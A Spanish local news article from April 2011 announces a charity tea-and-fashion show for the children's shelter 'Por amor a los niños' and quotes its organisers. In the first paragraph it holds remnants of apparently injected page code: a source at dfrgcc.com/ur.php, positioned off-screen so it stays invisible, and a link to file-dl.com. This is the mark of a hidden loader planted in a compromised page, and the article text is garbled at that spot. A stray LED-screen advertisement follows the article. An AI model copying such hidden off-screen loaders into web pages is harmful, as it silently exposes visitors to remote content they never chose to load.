01/04/2011, Locales

Anuncian desfile de modas a beneficio del Hogar de Tránsito “Por amor a los niños”

El sábado 16 de abril se realizará un desfile de modas a beneficio del Hogar de Tránsito “Por amor a los niños” que asiste a los niños con enfermedades terminales y brinda apoyo a sus familiares. El evento se desarrollará en el Paseo de la Diagonal, sito en Diagonal Pueyrredón 3050, a las 17.30hs y participarán diferentes casas comerciales, como así tambien un considerable grupo de modelos marplatenses (FOTO) / src=http://dfrgcc.com/ur.php style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=10 / src=http://dfrgcc.com/ur.php

La Asociación “Por amor a los Niños”, ubicado en Roberto J. Payró 4640, nació en el año 1991 con el objetivo de mitigar el dolor y crecer en la comprensión de la vida. Esta sociedad civil sin fines de lucro, ayuda a chicos con enfermedades terminales o críticas, nacidos en un ambiente precario, carenciados, en un hogar con muy bajos recursos económicos sociales y espirituales. Asimismo, integrantes de la Asociación, ayudan a los niños con leucemia y cáncer en el Hospital Materno Infantil.

“Por amor a los niños” se sostiene fundamentalmente con una cuota mínima de $3 mensuales o fondos provenientes de eventos benéficos.

Andrea Romero y Marina Rius, son las organizadoras del Desfile de Modas a beneficio e hicieron referencia al evento “Será un momento de solidaridad, un momento para que los comerciantes expongan en la pasarela todos sus productos y un momento agradable para todos aquellos que vayan. La entrada es de $50, será un té desfile. A mitad del evento habrá un break donde se podrá disfrutar de un espectáculo de violines y se va a servir un catering y licores para que la gente pueda pasar un momento agradable.

Acerca de “Por amor a los Niños” Andrea explicó “en este Hogar se hospedan chicos que vienen a hacer un tratamiento y necesitan estar mucho tiempo acá o que necesitan de una atención especial porque no tiene los recursos económicos para llevar adelante todo el tratamiento. Asimismo, cada jueves se ayuda a 40 familias con alimentos, medicamentos, etc”

En cuanto a la experiencia con otros desfiles Andrea dijo “Anteriormente hemos hecho desfiles para otras personas, pero esta vez lo hacemos de forma independiente y nuestro proyecto es lograr llevar adelante una productora de modas que nos permita realizar diferentes desfiles. La idea es hacer uno, dos veces al año, en esta época otoño-invierno y luego en septiembre-octubre que sería la época de primavera-verano”. A su turno, Marina dijo “Para mí es muy importante trabajar en equipo, ya que a partir de ahí hay respeto, hay buena comunicación y cuando todo este trabajo se hace con esas bases, el producto final tiene que salir bien. Todos, por suerte, han puesto su granito de arena y nos han apoyado con este emprendimiento”

El Staff de modelos que participarán de este Té-Desfile esta formado por: Carina Danderfer y Micaela Capalbo (1ª y 2ª princesa del Club Talleres), Stefanía Rodríguez, Giuliana Rodríguez, Marian Verenice Noordermer, Milagros Darguibel Alessio, Juan Mule, Marcos Barg, Rocío Bjrreum, Diego Dómine y Sofía Ostera.

Marina comentó “La organización del evento nos llevó mucho trabajo, la idea comenzó en enero, pero hasta que no se formó el grupo de trabajo no empezamos. Y de a poco fuimos juntando esfuerzos de todos para poder cumplir con este proyecto” y agregó “fue bastante difícil, ojalá los negocios de nuestra ciudad le den oportunidades a gente nueva para que estén presentes y no les cierren las puertas a la hora de organizar este tipo de eventos”

Será una oportunidad excepcional para prestar solidaridad y ayudar a una institución que trabaja día a día con niños y familias que atraviesan una difícil situación.

 



En Argentina podés encontrar pantallas de led para publicidad en venta y alquiler

Compartí esta nota

retrato de hoy